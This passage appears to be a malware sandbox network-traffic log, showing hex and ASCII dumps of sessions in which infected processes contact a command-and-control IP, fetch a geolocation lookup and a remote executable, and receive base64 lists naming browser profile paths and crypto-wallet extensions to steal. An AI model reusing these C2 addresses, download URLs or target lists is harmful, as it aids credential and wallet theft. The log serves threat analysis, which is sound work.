                                                                                              2024-05-25 19:29:46 UTC16384INData Raw: 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62
                                                                                              Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
                                                                                              2024-05-25 19:29:46 UTC3768INData Raw: 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 36 38 39 37 31 37 38 39 39 2f 62 61 64 67 65 73 22 3e 0d 0a 09 09 09 09 09 09 09
                                                                                              Data Ascii: <div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199689717899/badges">
                                                                                              2024-05-25 19:29:46 UTC1028INData Raw: 20 74 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 72 6f 76 69 64 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0d 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f
                                                                                              Data Ascii: this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.44976565.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:47 UTC186OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:29:48 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:29:48 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:29:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.44976865.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:50 UTC278OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBK
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 278
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:29:50 UTC278OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 33 34 44 42 35 37 35 43 36 43 31 31 38 30 30 38 36 39 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44
                                                                                              Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="hwid"2534DB575C6C118008692-a33c7340-61ca-11ee-8c18-806e6f6e6963------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------D
                                                                                              2024-05-25 19:29:51 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:29:51 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:29:51 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 3a1|1|1|1|23b9757c51a5710499a79eeb8b1a014e|1|1|1|0|0|50000|00


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.449772188.114.96.34433128C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:54 UTC85OUTGET /geo.json HTTP/1.1
                                                                                              User-Agent: Microsoft Internet Explorer
                                                                                              Host: api.2ip.ua
                                                                                              2024-05-25 19:29:54 UTC897INHTTP/1.1 200 OK
                                                                                              Date: Sat, 25 May 2024 19:29:54 GMT
                                                                                              Content-Type: application/json
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              strict-transport-security: max-age=63072000; preload
                                                                                              x-frame-options: SAMEORIGIN
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1; mode=block; report=...
                                                                                              access-control-allow-origin: *
                                                                                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KDKl3KGYwMFO%2FnovgSWFq%2BSe3yE%2B%2FqwKhV%2BzcleHI9g8y8fJsp8kbFTt5HCzQEzOmIhayNO9pEYaVOeLm17ARuOF5qfycqJEtXcxA%2B6nbe%2BjjR8hcsnFEt9rajdW"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8897efd9286732ca-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-05-25 19:29:54 UTC419INData Raw: 31 39 63 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34
                                                                                              Data Ascii: 19c{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044
                                                                                              2024-05-25 19:29:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.449773192.185.16.1144432580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:54 UTC167OUTGET /TEMPradius.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: nessotechbd.com
                                                                                              2024-05-25 19:29:54 UTC397INHTTP/1.1 404 Not Found
                                                                                              Date: Sat, 25 May 2024 19:29:54 GMT
                                                                                              Server: Apache
                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                              Link: <https://nessotechbd.com/wp-json/>; rel="https://api.w.org/"
                                                                                              Upgrade: h2,h2c
                                                                                              Connection: Upgrade
                                                                                              Vary: Accept-Encoding
                                                                                              X-Endurance-Cache-Level: 2
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              2024-05-25 19:29:54 UTC7795INData Raw: 33 37 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 65 73 73 6f 74 65 63 68 62 64 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e
                                                                                              Data Ascii: 37e1<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://nessotechbd.com/xmlrpc.php" /><script type="text/javascript">document.documentElemen
                                                                                              2024-05-25 19:29:54 UTC6516INData Raw: 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 64 65 65 70 3a 20 31 32 70 78 20 31 32 70 78 20 35 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35
                                                                                              Data Ascii: 6rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 25
                                                                                              2024-05-25 19:29:54 UTC2INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2024-05-25 19:29:54 UTC8192INData Raw: 32 35 34 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 64 69 76 69 2d 66 6f 6e 74 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c
                                                                                              Data Ascii: 254a<link rel='stylesheet' id='divi-fonts-css' href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800&#038;subset=latin,latin-ext&#038;display=swap' type='text/css' media='all' /><l
                                                                                              2024-05-25 19:29:54 UTC1360INData Raw: 2d 63 6f 6e 74 65 6e 74 5c 2f 74 68 65 6d 65 73 5c 2f 44 69 76 69 5c 2f 69 6d 61 67 65 73 22 2c 22 62 75 69 6c 64 65 72 5f 69 6d 61 67 65 73 5f 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6e 65 73 73 6f 74 65 63 68 62 64 2e 63 6f 6d 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 74 68 65 6d 65 73 5c 2f 44 69 76 69 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 62 75 69 6c 64 65 72 5c 2f 69 6d 61 67 65 73 22 2c 22 65 74 5f 66 72 6f 6e 74 65 6e 64 5f 6e 6f 6e 63 65 22 3a 22 35 66 64 31 66 63 61 30 38 38 22 2c 22 73 75 62 73 63 72 69 70 74 69 6f 6e 5f 66 61 69 6c 65 64 22 3a 22 50 6c 65 61 73 65 2c 20 63 68 65 63 6b 20 74 68 65 20 66 69 65 6c 64 73 20 62 65 6c 6f 77 20 74 6f 20 6d 61 6b 65 20 73 75 72 65 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 63 6f 72 72 65
                                                                                              Data Ascii: -content\/themes\/Divi\/images","builder_images_uri":"https:\/\/nessotechbd.com\/wp-content\/themes\/Divi\/includes\/builder\/images","et_frontend_nonce":"5fd1fca088","subscription_failed":"Please, check the fields below to make sure you entered the corre
                                                                                              2024-05-25 19:29:54 UTC2INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2024-05-25 19:29:54 UTC331INData Raw: 31 33 66 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6e 65 73 73 6f 74 65 63 68 62 64 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 44 69 76 69 2f 6a 73 2f 63 75 73 74 6f 6d 2e 75 6e 69 66 69 65 64 2e 6a 73 3f 76 65 72 3d 34 2e 39 2e 32 22 20 69 64 3d 22 64 69 76 69 2d 63 75 73 74 6f 6d 2d 73 63 72 69 70 74 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6e 65 73 73 6f 74 65 63 68 62 64 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 44 69 76 69 2f 63 6f 72 65 2f 61 64 6d 69 6e 2f 6a 73 2f 63
                                                                                              Data Ascii: 13f<script type="text/javascript" src="https://nessotechbd.com/wp-content/themes/Divi/js/custom.unified.js?ver=4.9.2" id="divi-custom-script-js"></script><script type="text/javascript" src="https://nessotechbd.com/wp-content/themes/Divi/core/admin/js/c


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.44977165.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:54 UTC278OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----DAEHJJECAEGCAAAAEGIE
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:29:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 45 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------DAEHJJECAEGCAAAAEGIEContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------DAEHJJECAEGCAAAAEGIEContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------DAEHJJECAEGCAAAAEGIECont
                                                                                              2024-05-25 19:29:54 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:29:54 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:29:54 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                              Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.44977665.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:56 UTC278OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 331
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:29:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74
                                                                                              Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------CGHCGIIDGDAKFIEBKFCFCont
                                                                                              2024-05-25 19:29:56 UTC158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Sat, 25 May 2024 19:29:56 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              2024-05-25 19:29:56 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                              Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.44977965.109.242.594435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:58 UTC278OUTPOST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD
                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                              Host: 65.109.242.59
                                                                                              Content-Length: 332
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
